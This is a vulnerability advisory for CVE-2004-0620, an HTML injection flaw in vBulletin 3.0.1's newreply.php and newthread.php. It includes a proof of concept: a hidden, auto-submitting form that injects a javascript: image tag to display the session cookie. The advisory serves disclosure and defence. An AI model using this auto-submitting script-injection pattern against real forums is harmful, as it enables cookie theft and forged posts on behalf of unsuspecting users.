VBulletin Multiple Module HTML Injection Vulnerability

BID:10602

Info

VBulletin Multiple Module HTML Injection Vulnerability

Bugtraq ID: 10602
Class: Input Validation Error
CVE: CVE-2004-0620
Remote: Yes
Local: No
Published: Jun 24 2004 12:00AM
Updated: Jul 12 2009 05:16AM
Credit: Discovery is credited to Cheng Peng Su <[email protected]>.
Vulnerable: VBulletin VBulletin 3.0.1
Not Vulnerable:

Discussion

VBulletin Multiple Module HTML Injection Vulnerability

VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.

An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.

This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.

Exploit / POC

VBulletin Multiple Module HTML Injection Vulnerability

No exploit is required.

The following proof of concept is available:
&lt;form action="http://www.example.com/newreply.php" name="vbform"
method="post" style='visibility:hidden'&gt;
&lt;input name="WYSIWYG_HTML"
value="&amp;lt;IMG src=&amp;quot;javascript:alert(document.cookie)&amp;quot;&amp;gt;"/&gt;
&lt;input name="do" value="postreply"/&gt;
&lt;input name="t" value="123456" /&gt;
&lt;input name="p" value="123456" /&gt;
&lt;input type="submit" class="button" name="preview"/&gt;
&lt;/form&gt;
&amp;lt;script&amp;gt;
document.all.preview.click();
&amp;lt;/script&amp;gt;

Solution / Fix

VBulletin Multiple Module HTML Injection Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

VBulletin Multiple Module HTML Injection Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report